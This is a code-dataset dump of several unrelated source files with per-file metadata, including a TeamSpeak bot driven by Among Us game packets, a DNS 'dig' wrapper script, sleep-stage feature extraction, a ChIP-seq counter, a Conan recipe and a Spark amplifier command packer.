"game_dead_talk_power",
0,
"Talk power to set main channel to when game isn't happening",
)
flags.DEFINE_integer(
"keepalive_interval_seconds",
60,
"Interval between sending TS3 serverquery keepalives",
)
class UsernameDatabase:
def __init__(self, data):
self.usernames_to_ts3_db_ids = {}
self.ts3_db_ids_to_usernames = {}
for usernames, client_ids in data:
for username in usernames:
self.usernames_to_ts3_db_ids[username] = list(client_ids)
for client_id in client_ids:
self.ts3_db_ids_to_usernames[client_id] = list(usernames)
def usernames_from_db_id(self, db_id):
return self.ts3_db_ids_to_usernames.get(db_id, [])
def db_ids_from_username(self, username):
return self.usernames_to_ts3_db_ids.get(username, [])
USERNAME_DB = UsernameDatabase(
[
(("Memories",), (240,)),
(("Zenras", "Giblets", "Stelbig"), (279,)),
(("Mumfrey",), (112,)),
(("SilvaJ",), (199,)),
(("th0rney",), (146,)),
(("HDWolfGamer",), (276,)),
(("lukegb",), (164,)),
(
("felltir",),
(
205,
243,
),
),
(
("NSE",),
(
171,
177,
288,
),
),
(
("Rosalyan",),
(
174,
269,
),
),
(("BrackishBrit",), (168,)),
(
("sirrambod",),
(
122,
155,
178,
),
),
(("Echo",), (302,)),
]
)
@dataclasses.dataclass(frozen=True, eq=True)
class GameState:
round_state: amongus.state_tracker.RoundState = (
amongus.state_tracker.RoundState.LOBBY
)
alive_players: FrozenSet[str] = dataclasses.field(default_factory=frozenset)
dead_players: FrozenSet[str] = dataclasses.field(default_factory=frozenset)
@dataclasses.dataclass(frozen=True)
class TS3Client:
client_name: str
client_id: int
client_database_id: int
channel_id: int
    server_groups: FrozenSet[int]
class TS3Bot:
def __init__(self, ts3conn, queue):
self.ts3conn = ts3conn
self.queue = queue
self.last_keepalive = None
self.state = GameState()
def send_keepalive_if_needed(self):
now = time.monotonic()
if (
self.last_keepalive is not None
and (now - self.last_keepalive) < FLAGS.keepalive_interval_seconds
):
return
logging.info("Sending TS3 serverquery keepalive")
self.last_keepalive = now
self.ts3conn.send_keepalive()
def online_clients(self):
online_clients = []
for client in self.ts3conn.exec_("clientlist", "groups").parsed:
if client["client_type"] != "0":
continue
online_clients.append(
TS3Client(
client_name=client["client_nickname"],
client_id=int(client["clid"]),
client_database_id=int(client["client_database_id"]),
channel_id=int(client["cid"]),
server_groups=frozenset(
int(n) for n in client["client_servergroups"].split(",")
),
)
)
return online_clients
@classmethod
def _lowercase_names(cls, names):
return (n.lower() for n in names)
@classmethod
def _is_player_in_list(cls, client, player_names):
return any(
(un in cls._lowercase_names(player_names))
for un in cls._lowercase_names(
USERNAME_DB.usernames_from_db_id(client.client_database_id)
)
)
def sync_server_group_with_list(self, sgid, player_names, online_clients):
current_clients = set()
for client in online_clients:
if sgid in client.server_groups:
current_clients.add(client)
want_clients = set()
for client in online_clients:
if self._is_player_in_list(client, player_names):
want_clients.add(client)
modified_database_ids = set()
to_add = want_clients - current_clients
to_remove = current_clients - want_clients
for client in to_add:
logging.info("Adding %s to server group %d", str(client), sgid)
if client.client_database_id in modified_database_ids:
continue
modified_database_ids.add(client.client_database_id)
self.ts3conn.exec_(
"servergroupaddclient", sgid=sgid, cldbid=client.client_database_id
)
for client in to_remove:
logging.info("Removing %s from server group %d", str(client), sgid)
if client.client_database_id in modified_database_ids:
continue
modified_database_ids.add(client.client_database_id)
self.ts3conn.exec_(
"servergroupdelclient", sgid=sgid, cldbid=client.client_database_id
)
def sync_server_groups(self, online_clients):
want_alive_players = self.state.alive_players
want_dead_players = self.state.dead_players
if self.state.round_state in (
amongus.state_tracker.RoundState.LOBBY,
amongus.state_tracker.RoundState.POSTGAME,
):
want_alive_players = []
want_dead_players = []
        self.sync_server_group_with_list(
            FLAGS.alive_server_group,
            want_alive_players,
            online_clients,
        )
        self.sync_server_group_with_list(
            FLAGS.dead_server_group, want_dead_players, online_clients
        )
def sync_main_channel_status(self):
target_channel_topic = self.state.round_state.value
if self.state.round_state in (
amongus.state_tracker.RoundState.LOBBY,
amongus.state_tracker.RoundState.POSTGAME,
):
target_channel_talk_power = FLAGS.game_dead_talk_power
elif self.state.round_state == amongus.state_tracker.RoundState.MEETING:
target_channel_talk_power = FLAGS.round_discuss_talk_power
else:
target_channel_talk_power = FLAGS.round_live_talk_power
current_status = self.ts3conn.exec_("channelinfo", cid=FLAGS.main_channel_id)
current_channel_talk_power = int(
current_status.parsed[0]["channel_needed_talk_power"]
)
current_channel_topic = current_status.parsed[0]["channel_topic"]
if (
current_channel_talk_power != target_channel_talk_power
or current_channel_topic != target_channel_topic
):
logging.info(
"Updating channel id=%d with talk power=%d and topic=%s",
FLAGS.main_channel_id,
target_channel_talk_power,
target_channel_topic,
)
self.ts3conn.exec_(
"channeledit",
cid=FLAGS.main_channel_id,
channel_needed_talk_power=target_channel_talk_power,
channel_topic=target_channel_topic,
)
def _move_people_matching_predicate(self, online_clients, predicate, cid, log_text):
to_move = set()
for client in online_clients:
if predicate(client):
logging.info("Moving client %s %s", str(client), log_text)
to_move.add(client)
if to_move:
cmd = self.ts3conn.query("clientmove", cid=cid)
for client in to_move:
cmd = cmd.pipe(clid=client.client_id)
cmd.fetch()
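    # The moves above are batched into one piped "clientmove" serverquery
    # command, so every client is relocated in a single round trip.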
def move_people(self, online_clients):
if self.state.round_state in (
amongus.state_tracker.RoundState.LOBBY,
amongus.state_tracker.RoundState.POSTGAME,
amongus.state_tracker.RoundState.MEETING,
):
# Empty the ghost lobby.
self._move_people_matching_predicate(
online_clients,
lambda client: client.channel_id == FLAGS.dead_channel_id,
FLAGS.main_channel_id,
"out of dead channel into main lobby",
)
elif self.state.round_state == amongus.state_tracker.RoundState.ACTIVE:
            # Move ghosts to the ghost lobby.
self._move_people_matching_predicate(
online_clients,
lambda client: client.channel_id == FLAGS.main_channel_id
and self._is_player_in_list(client, self.state.dead_players),
FLAGS.dead_channel_id,
"INTO dead channel",
)
def sync(self):
online_clients = self.online_clients()
self.sync_server_groups(online_clients)
self.sync_main_channel_status()
self.move_people(online_clients)
def run(self):
self.ts3conn.exec_("use", sid=1)
self.ts3conn.exec_("servernotifyregister", event="server")
self.ts3conn.exec_("servernotifyregister", event="channel", id=0)
self.sync()
while True:
self.send_keepalive_if_needed()
            try:
                # Any TS3 event (its contents are unused) triggers a resync.
                self.ts3conn.wait_for_event(timeout=0.2)
                self.sync()
            except ts3.query.TS3TimeoutError:
                pass
try:
result = self.queue.get_nowait()
self.state = result
self.sync()
except queue.Empty:
pass
class ListenerThread(threading.Thread):
def __init__(self, queue, **kwargs):
super().__init__(**kwargs)
self.queue = queue
self.state = amongus.state_tracker.GameState()
self.my_state = GameState()
def process_packet(self, pkt):
if not self.state.process_packet(pkt):
return
round_state = self.state.round_state
changes = {"round_state": round_state}
if (
round_state == amongus.state_tracker.RoundState.LOBBY
or round_state == amongus.state_tracker.RoundState.MEETING
or amongus.rpcs.VotingCompleteRPC in pkt
or amongus.rpcs.SetInfectedRPC in pkt
):
# Update dead/alive players.
game_data = self.state.find_netobj_of_type(
amongus.state_tracker.NetObjGameData
)
            if not game_data:
                logging.error(
                    "NetObjGameData missing while updating player lists :( - no idea what's going on"
                )
                return
living_players = set()
dead_players = set()
for p in game_data.players:
if p.is_dead:
dead_players.add(p.name)
else:
living_players.add(p.name)
changes.update(
alive_players=frozenset(living_players),
dead_players=frozenset(dead_players),
)
new_my_state = dataclasses.replace(self.my_state, **changes)
if new_my_state != self.my_state:
logging.info("New state: %s", str(new_my_state))
self.queue.put(new_my_state)
self.my_state = new_my_state
    def run(self):
        logging.info("listener ready")
scapy.all.sniff(
prn=self.process_packet, filter="udp and (src port 22023 or dst port 22023)"
)
def main(argv):
if len(argv) != 1:
raise app.UsageError("Too many arguments.")
if not FLAGS.connection_string:
raise app.UsageError("--connection_string is required.")
scapy.all.conf.use_pcap = True
scapy.all.conf.sniff_promisc = False
queue = multiprocessing.Queue()
listener_thread = ListenerThread(queue, daemon=True)
listener_thread.start()
with ts3.query.TS3ServerConnection(FLAGS.connection_string) as ts3conn:
bot = TS3Bot(ts3conn, queue)
bot.run()
if __name__ == "__main__":
app.run(main)
| 33.629353 | 95 | 0.600266 | 1,518 | 13,519 | 5.066535 | 0.201581 | 0.023404 | 0.041997 | 0.049018 | 0.344819 | 0.264465 | 0.186062 | 0.141204 | 0.108178 | 0.094656 | 0 | 0.01508 | 0.308381 | 13,519 | 401 | 96 | 33.713217 | 0.807487 | 0.018566 | 0 | 0.205128 | 0 | 0 | 0.109427 | 0.010256 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054131 | false | 0.005698 | 0.037037 | 0.011396 | 0.150997 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
65146ef8dc35caec09ada8e0674533c36180a7c2 | 4,469 | py | Python | Packs/Dig/Scripts/Dig/Dig.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 799 | 2016-08-02T06:43:14.000Z | 2022-03-31T11:10:11.000Z | Packs/Dig/Scripts/Dig/Dig.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 9,317 | 2016-08-07T19:00:51.000Z | 2022-03-31T21:56:04.000Z | Packs/Dig/Scripts/Dig/Dig.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 1,297 | 2016-08-04T13:59:00.000Z | 2022-03-31T23:43:06.000Z | import re
import subprocess
import traceback
from typing import Any, Dict
import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
''' STANDALONE FUNCTION '''
# Run Dig command on the server and get A record for the specified host
def dig_result(server: str, name: str):
    try:
        cmd = ['dig']
        if server:
            cmd.append(f"@{server}")
        cmd += [name, '+short', '+identify']
        dig_output = subprocess.check_output(cmd, stderr=subprocess.STDOUT, universal_newlines=True)
        if not dig_output:
            raise ValueError("Couldn't find A record for:\n" + name)
        resolved_addresses, dns_server = regex_result(dig_output, reverse_lookup=False)
        return {"name": name, "resolvedaddresses": resolved_addresses, "nameserver": dns_server}
    except subprocess.CalledProcessError as e:
        return_error(e.output)
# Run Dig command on the server and get PTR record for the specified IP
def reverse_dig_result(server: str, name: str):
    try:
        cmd = ['dig']
        if server:
            cmd.append(f"@{server}")
        cmd += ['+answer', '-x', name, '+short', '+identify']
        dig_output = subprocess.check_output(cmd, stderr=subprocess.STDOUT, universal_newlines=True)
        if not dig_output:
            raise ValueError("Couldn't find PTR record for:\n" + name)
        resolved_addresses, dns_server = regex_result(dig_output, reverse_lookup=True)
        return {"name": name, "resolveddomain": resolved_addresses, "nameserver": dns_server}
    except subprocess.CalledProcessError as e:
        return_error(e.output)
def regex_result(dig_output: str, reverse_lookup: bool):
    # regex phrase to catch a number between 0 and 255
num_0_255 = r'(?:25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])'
try:
if not reverse_lookup:
regex_results_ip = re.findall(rf'\b(?:{num_0_255}(?:\[\.\]|\.)){{3}}{num_0_255}\b', dig_output)
if not regex_results_ip:
raise ValueError("Couldn't find results:\n")
resolved_addresses = regex_results_ip[::2]
dns_server = regex_results_ip[1]
else:
regex_results_domain = re.findall(
rf'\b^[\S]+|(?:{num_0_255}(?:\[\.\]|\.)){{3}}{num_0_255}\b', dig_output)
if not regex_results_domain:
raise ValueError("Couldn't find results:\n")
resolved_addresses = regex_results_domain[0]
dns_server = regex_results_domain[1]
except Exception as e:
return_error(str(e))
return resolved_addresses, dns_server
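# Note on the assumed dig output shape (not stated in this script): with
# '+short +identify' each answer line looks like
#   "<answer IP> from server <server IP> in <N> ms"
# so the IP regex alternates between resolved addresses (even indices) and the
# answering name server (odd indices), which regex_result slices apart above.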
''' COMMAND FUNCTION '''
def dig_command(args: Dict[str, Any]) -> CommandResults:
server = args.get('server', None)
name = args.get('name', None)
reverse_lookup = argToBoolean(args.get("reverseLookup"))
if reverse_lookup:
result = reverse_dig_result(server, name)
else:
result = dig_result(server, name)
return CommandResults(
outputs_prefix='digresults',
outputs=result,
ignore_auto_extract=True
)
''' MAIN FUNCTION '''
def main():
try:
return_results(dig_command(demisto.args()))
except Exception as ex:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Failed to execute Dig. Error: {str(ex)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 33.103704 | 128 | 0.620944 | 537 | 4,469 | 4.957169 | 0.221601 | 0.050714 | 0.047333 | 0.049587 | 0.610068 | 0.610068 | 0.610068 | 0.610068 | 0.587528 | 0.587528 | 0 | 0.016319 | 0.259566 | 4,469 | 134 | 129 | 33.350746 | 0.788154 | 0.051242 | 0 | 0.431818 | 0 | 0.011364 | 0.155239 | 0.036214 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056818 | false | 0 | 0.068182 | 0 | 0.193182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6514dcd90c158534f6e189d0810af735f39e7bb2 | 7,691 | py | Python | crf/feature_ext.py | wadpac/SleepStageClassification | 5b288995e62bbd66faa66bd932b06af8a65f8445 | [
"Apache-2.0"
] | 24 | 2019-04-15T09:18:51.000Z | 2022-03-05T14:09:34.000Z | crf/feature_ext.py | wadpac/SleepStageClassification | 5b288995e62bbd66faa66bd932b06af8a65f8445 | [
"Apache-2.0"
] | 2 | 2021-01-28T01:02:06.000Z | 2021-04-02T06:34:04.000Z | crf/feature_ext.py | wadpac/SleepStageClassification | 5b288995e62bbd66faa66bd932b06af8a65f8445 | [
"Apache-2.0"
] | 11 | 2019-05-30T19:27:39.000Z | 2021-06-19T02:41:53.000Z | import sys,os
import numpy as np
import pandas as pd
import h5py
import math
from scipy.stats import entropy
from collections import Counter
import pickle
# Get Euclidean Norm minus One
def get_ENMO(x,y,z):
enorm = np.sqrt(x*x + y*y + z*z)
ENMO = np.maximum(enorm-1.0, 0.0)
return ENMO
# Get tilt angles
def get_tilt_angles(x,y,z):
angle_x = np.arctan2(x, np.sqrt(y*y + z*z)) * 180.0/math.pi
angle_y = np.arctan2(y, np.sqrt(x*x + z*z)) * 180.0/math.pi
angle_z = np.arctan2(z, np.sqrt(x*x + y*y)) * 180.0/math.pi
return angle_x, angle_y, angle_z
# Get Locomotor Inactivity During Sleep
def get_LIDS(timestamp, ENMO):
df = pd.concat((timestamp, pd.Series(ENMO)), axis=1)
df.columns = ['timestamp','ENMO']
df.set_index('timestamp', inplace=True)
df['ENMO_sub'] = np.where(ENMO < 0.02, 0, ENMO-0.02) # assuming ENMO is in g
ENMO_sub_smooth = df['ENMO_sub'].rolling('600s').sum() # 10-minute rolling sum
df['LIDS_unfiltered'] = 100.0 / (ENMO_sub_smooth + 1.0)
LIDS = df['LIDS_unfiltered'].rolling('1800s').mean().values # 30-minute rolling average
return LIDS
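# LIDS as computed above: ENMO below 0.02 g is zeroed, activity is summed over a
# 10-minute rolling window, inverted (100 / (sum + 1)), then smoothed with a
# 30-minute rolling mean.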
def compute_entropy(df, bins=20):
hist, bin_edges = np.histogram(df, bins=bins)
p = hist/float(hist.sum())
ent = entropy(p)
return ent
# Aggregate statistics of features over a given time interval
def get_stats(timestamp, feature, token_interval):
feat_df = pd.DataFrame(data={'timestamp':timestamp, 'feature':feature})
feat_df.set_index('timestamp', inplace=True)
feat_mean = feat_df.resample(str(token_interval)+'S').mean()
feat_std = feat_df.resample(str(token_interval)+'S').std()
feat_min = feat_df.resample(str(token_interval)+'S').min()
feat_max = feat_df.resample(str(token_interval)+'S').max()
feat_mad = feat_df.resample(str(token_interval)+'S').apply(pd.DataFrame.mad)
feat_ent1 = feat_df.resample(str(token_interval)+'S').apply(compute_entropy, bins=20)
feat_ent2 = feat_df.resample(str(token_interval)+'S').apply(compute_entropy, bins=200)
stats = np.vstack((feat_mean['feature'], feat_std['feature'], feat_min['feature'],
feat_max['feature'], feat_mad['feature'], feat_ent1['feature'],
feat_ent2['feature'])).T
return stats
def get_categ(df, default='NaN'):
    ctr = Counter(df)
    for key in ctr:
        ctr[key] = ctr[key] / float(len(df))
    dom_categ = ctr.most_common()[0]
    if dom_categ[1] >= 0.7:  # a category covering at least 70% of the interval is dominant
        dom_categ = dom_categ[0]
    else:
        dom_categ = default
    return dom_categ
def get_dominant_categ(timestamp, categ, token_interval, default='NaN'):
categ_df = pd.DataFrame(data={'timestamp':timestamp, 'category':categ})
categ_df.set_index('timestamp', inplace=True)
dom_categ = categ_df.resample(str(token_interval)+'S').apply(get_categ, default=default)
return np.array(dom_categ['category'])
# Get sequence labels in BIEO format - Beginning, Inside, End, Outside
def get_sequential_label(labels, nonwear, states):
# Initialize all labels as 'O'
seq_labels = ['O'] * len(labels)
# Rename first and last labels of the sequence
if labels[0] in states:
seq_labels[0] = 'B-' + labels[0]
if labels[-1] in states:
seq_labels[-1] = 'E-' + labels[-1]
# Rename all other labels based on their previous and next labels
for i in range(1,len(labels)-1):
# If nonwear, retain label as 'O'
if nonwear[i] is True or labels[i] not in states:
continue
# Label beginning of state
if labels[i] != labels[i-1]:
seq_labels[i] = 'B-' + labels[i]
else: # Inside a state
seq_labels[i] = 'I-' + labels[i]
# Label end of state
if labels[i] != labels[i+1]:
seq_labels[i] = 'E-' + labels[i]
return seq_labels
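# Illustrative (toy input, not from the data): labels ['Wake', 'Wake', 'NREM 1']
# with no nonwear yields ['B-Wake', 'E-Wake', 'E-NREM 1']; the middle token is
# first marked 'I-Wake' and then promoted to 'E-Wake' because the state changes.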
def convert2seq(features, labels, n_seq_tokens=10, user=None, position=None, dataset=None):
sequences = []
ntokens = len(labels)
columns = ['ENMO_mean','ENMO_std','ENMO_min','ENMO_max','ENMO_mad','ENMO_entropy1','ENMO_entropy2',
'angz_mean','angz_std','angz_min','angz_max','angz_mad','angz_entropy1','angz_entropy2',
'LIDS_mean','LIDS_std','LIDS_min','LIDS_max','LIDS_mad','LIDS_entropy1','LIDS_entropy2']
for st_idx in range(0,ntokens,n_seq_tokens):
end_idx = min(ntokens, st_idx+n_seq_tokens)
if (end_idx-st_idx) < (n_seq_tokens//2): # Discard last sequence if too short
continue
lbl_ctr = Counter(labels[st_idx:end_idx]).most_common()
lbl_ctr = [(lbl,float(val)/n_seq_tokens) for lbl,val in lbl_ctr]
        # Discard sequences that are 60% or more 'O'
if lbl_ctr[0][0] == 'O' and lbl_ctr[0][1] >= 0.6:
continue
else:
feat_df = pd.DataFrame(features[st_idx:end_idx], columns=columns)
feat = list(feat_df.T.to_dict().values())
lbl = labels[st_idx:end_idx]
sequences.append({'features': feat, 'labels': lbl, 'user': user, 'position': position, 'dataset': dataset})
return sequences
def main(argv):
indir = argv[0]
token_interval = int(argv[1]) # Time interval in seconds for tokens in a seq
num_seq_tokens = int(argv[2]) # Number of tokens in a sequence
outdir = argv[3]
outdir = os.path.join(outdir, 'seq_'+str(num_seq_tokens)+'tok_'+str(token_interval)+'sec')
if not os.path.exists(outdir):
os.makedirs(outdir)
# Sleep states
states = ['Wake','NREM 1','NREM 2','NREM 3','REM']
files = os.listdir(indir)
for idx,fname in enumerate(files):
print('Processing ' + fname)
fh = h5py.File(os.path.join(indir,fname), 'r')
x = np.array(fh['X'])
y = np.array(fh['Y'])
z = np.array(fh['Z'])
timestamp = pd.Series(fh['DateTime']).apply(lambda x: x.decode('utf8'))
timestamp = pd.to_datetime(timestamp, format='%Y-%m-%d %H:%M:%S.%f')
# Get ENMO and acceleration angles
ENMO = get_ENMO(x,y,z)
angle_x, angle_y, angle_z = get_tilt_angles(x,y,z)
# Get LIDS (Locomotor Inactivity During Sleep)
LIDS = get_LIDS(timestamp, ENMO)
# Get statistics of features for given time intervals
ENMO_stats = get_stats(timestamp, ENMO, token_interval)
angle_z_stats = get_stats(timestamp, angle_z, token_interval)
LIDS_stats = get_stats(timestamp, LIDS, token_interval)
feat = np.hstack((ENMO_stats, angle_z_stats, LIDS_stats))
# Get nonwear for each interval
nonwear = np.array(fh['Nonwear'])
nonwear_agg = get_dominant_categ(timestamp, nonwear, token_interval, default=True)
# Standardize label names for both datasets
# Get label for each interval
label = np.array([x.decode('utf8') for x in np.array(fh['SleepState'])], dtype=object)
label[label == 'W'] = 'Wake'
label[label == 'N1'] = 'NREM 1'
label[label == 'N2'] = 'NREM 2'
label[label == 'N3'] = 'NREM 3'
label[label == 'R'] = 'REM'
label_agg = get_dominant_categ(timestamp, label, token_interval)
# Get sequence labels for the user
seq_label = get_sequential_label(label_agg, nonwear_agg, states)
# Uncomment for PSGNewcastle2015 data
user = fname.split('_')[0]
position = fname.split('_')[1]
dataset = 'Newcastle'
# # Uncomment for UPenn_Axivity data
# user = fname.split('.h5')[0][-4:]
# position = 'NaN'
# dataset = 'UPenn'
    # Break up data into sequences of the specified number of non-overlapping tokens.
    # Sequences that are 60% or more 'O' are excluded (see convert2seq).
sequences = convert2seq(feat, seq_label, n_seq_tokens=num_seq_tokens, user=user, position=position, dataset=dataset)
pickle.dump(sequences, open(os.path.join(outdir,fname.split('.h5')[0]+'.pkl'),'wb'))
print(len(sequences))
if __name__ == '__main__':
main(sys.argv[1:])
| 40.478947 | 120 | 0.672084 | 1,189 | 7,691 | 4.183347 | 0.226241 | 0.044431 | 0.028951 | 0.028951 | 0.175915 | 0.146562 | 0.089264 | 0.042622 | 0.035384 | 0.035384 | 0 | 0.019502 | 0.179951 | 7,691 | 189 | 121 | 40.693122 | 0.769145 | 0.171889 | 0 | 0.043165 | 0 | 0 | 0.096351 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071942 | false | 0 | 0.057554 | 0 | 0.194245 | 0.014388 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
651645a6f5373edf603bb785090e306dd5fe8a3d | 1,318 | py | Python | ChIP_counts.py | kaclark/DHS_intergenic_analysis | 5ae1dc1c257ae9dc0e001e07402bebd8e31f0f60 | [
"MIT"
] | null | null | null | ChIP_counts.py | kaclark/DHS_intergenic_analysis | 5ae1dc1c257ae9dc0e001e07402bebd8e31f0f60 | [
"MIT"
] | null | null | null | ChIP_counts.py | kaclark/DHS_intergenic_analysis | 5ae1dc1c257ae9dc0e001e07402bebd8e31f0f60 | [
"MIT"
] | null | null | null | import pandas as pd
from collections import Counter
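# Count, per ChIP antibody, how many peak intervals fall on each DHS id and
# export the per-DHS totals; DHSs with no peaks are written with a count of 0.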
DHS_ids = pd.read_csv("./data/mm10_data/DHSs/DHS_ids.bed", sep='\t', header=None, index_col=False)
all_ids = list(DHS_ids[0])
ChIP_data = ["H3K27ac", "H3K4me3", "Nanog", "Oct4", "Sox2"]
for antibody in ChIP_data:
    print("Beginning count of " + antibody + " data in DHSs")
    direct = "data/mm10_data/ChIP/"
    path = direct + antibody + ".bed"
    data = pd.read_csv(path, sep='\t', header=None, index_col=False)
    # Build a "chrom:start-end" id for every peak interval.
    ids = [str(c) + ":" + str(s) + "-" + str(e)
           for c, s, e in zip(data[0], data[1], data[2])]
    # Count how many peaks fall inside each DHS; Counter avoids the
    # O(n^2) membership scan over a growing list.
    freq_dict = Counter(ids)
    export_data = [[dhs, count] for dhs, count in freq_dict.items()]
    # DHSs with no overlapping peaks are exported with a count of 0.
    seen_ids = set(freq_dict)
    for dhs in all_ids:
        if dhs not in seen_ids:
            export_data.append([dhs, 0])
    export = pd.DataFrame(export_data)
    export_path = direct + antibody + "_counts.csv"
    export.to_csv(export_path, index=False, header=False)
| 25.843137 | 98 | 0.575873 | 195 | 1,318 | 3.753846 | 0.297436 | 0.054645 | 0.043716 | 0.04918 | 0.221311 | 0.131148 | 0.07377 | 0 | 0 | 0 | 0 | 0.019812 | 0.272382 | 1,318 | 50 | 99 | 26.36 | 0.743483 | 0 | 0 | 0 | 0 | 0 | 0.10038 | 0.025095 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025 | 0 | 0.025 | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
65178447d39aa1d04fd14df890c09c3895321d99 | 994 | py | Python | conanfile.py | DBrutski/2out | 28aecd80496250641672638c9ab2cfdc9e5df36d | [
"MIT"
] | null | null | null | conanfile.py | DBrutski/2out | 28aecd80496250641672638c9ab2cfdc9e5df36d | [
"MIT"
] | null | null | null | conanfile.py | DBrutski/2out | 28aecd80496250641672638c9ab2cfdc9e5df36d | [
"MIT"
] | null | null | null | from conans import ConanFile, CMake, tools
class OoutConan(ConanFile):
name = "2out"
version = "0.8"
description = "Object oriented unit testing framework"
license = "MIT"
url = "https://github.com/DronMDF/2out"
settings = "os", "compiler", "build_type", "arch"
options = {"shared": [True, False]}
default_options = "shared=False"
generators = "cmake"
def source(self):
self.run("git clone https://github.com/DronMDF/2out.git .")
self.run("git checkout v%s" % self.version)
tools.replace_in_file(
"CMakeLists.txt",
"ENABLE_TESTING()",
'\n'.join((
"include(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake)",
"conan_basic_setup()",
"ENABLE_TESTING()"
))
)
def build(self):
cmake = CMake(self)
cmake.configure()
cmake.build()
def package(self):
self.copy("*.h", dst="include/2out", src="2out")
self.copy("*.so", dst="lib", keep_path=False)
self.copy("*.a", dst="lib", keep_path=False)
def package_info(self):
self.cpp_info.libs = ["2out"]
| 24.85 | 61 | 0.660966 | 132 | 994 | 4.871212 | 0.575758 | 0.037325 | 0.043546 | 0.065319 | 0.136858 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009501 | 0.152918 | 994 | 39 | 62 | 25.487179 | 0.754157 | 0 | 0 | 0 | 0 | 0 | 0.343058 | 0.049296 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121212 | false | 0 | 0.030303 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
651a096d0289a3b8f9af99d7cb11375cc762d8b0 | 6,527 | py | Python | SparkCommander/SparkLib01.py | paulhamsh/Spark-Parser | bd6e12a2b41cadfc6e26dfd2b68061ffdc21da42 | [
"Apache-2.0"
] | 18 | 2020-12-08T17:18:04.000Z | 2022-01-15T09:42:03.000Z | SparkCommander/SparkLib01.py | paulhamsh/Spark-Parser | bd6e12a2b41cadfc6e26dfd2b68061ffdc21da42 | [
"Apache-2.0"
] | null | null | null | SparkCommander/SparkLib01.py | paulhamsh/Spark-Parser | bd6e12a2b41cadfc6e26dfd2b68061ffdc21da42 | [
"Apache-2.0"
] | 2 | 2020-12-16T07:22:56.000Z | 2021-01-31T10:28:44.000Z | ########
#
# Spark Lib
#
# Program to package commands to send to Positive Grid Spark
#
# See https://github.com/paulhamsh/Spark-Parser
#### PRESETS ####
import struct
block_header = b'\x01\xfe\x00\x00\x53\xfe'
size = 33 # could be anything, will be replaced
block_filler = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00'
chunk_header = b'\xf0\x01\x3a\x15'
this_chunk = 0
max_size = 0xad
######## Helper functions to package a command for the Spark (handles the 'format bytes')
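# Every group of seven payload bytes is preceded by one 'format byte'; bit n of
# that byte appears to flag the n-th byte of the group (MIDI-style 8-bit-to-
# 7-bit packing), which is why 'pos' wraps back to 1 after reaching 8 below.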
def pack_header(cmd, sub_cmd, multi):
    global snd_data, tmp_data, format_byte, this_chunk, this_cmd, this_sub_cmd
    global pos, header, block_pos, final_data, multi_chunk
    header = block_header + bytes([size]) + block_filler + chunk_header + bytes([cmd]) + bytes([sub_cmd])
    snd_data = header
    pos = 1
    block_pos = 0x10 + 0x06 + 1
    this_cmd = cmd
    this_sub_cmd = sub_cmd
    multi_chunk = multi
    format_byte = 0
    tmp_data = b''
    if multi_chunk:
        format_byte = 4  # I don't know why - seems wrong but it is CRITICAL this is 4 except for the non-final chunks
        tmp_data += b'\x03' + bytes([this_chunk]) + b'\x00'  # multi-chunk header - assumes 3 chunks
        pos += 3
        block_pos += 3
def end_chunk():
global snd_data, tmp_data, format_byte, pos, block_pos
# add_pack (b'\xf7', False)
tmp_data += b'\xf7'
pos += 1
block_pos += 1
# if pos == 8:
# snd_data += bytes([format_byte])
# snd_data += tmp_data
# format_byte = 0
# pos = 1
# block_pos += 1
# tmp_data = b''
if len(tmp_data) == 1:
snd_data += tmp_data # last byte is 0xf7 so we don't need a format byte
elif len(tmp_data) > 1:
snd_data += bytes([format_byte])
snd_data += tmp_data
def start_packing (cmd, sub_cmd, multi = False):
global final_data, this_chunk
final_data = []
this_chunk = 0
pack_header (cmd, sub_cmd, multi)
def add_pack (msg, setformat = True):
global snd_data, tmp_data, pos, format_byte, block_pos, this_chunk, multi_chunk, final_data
if setformat == True:
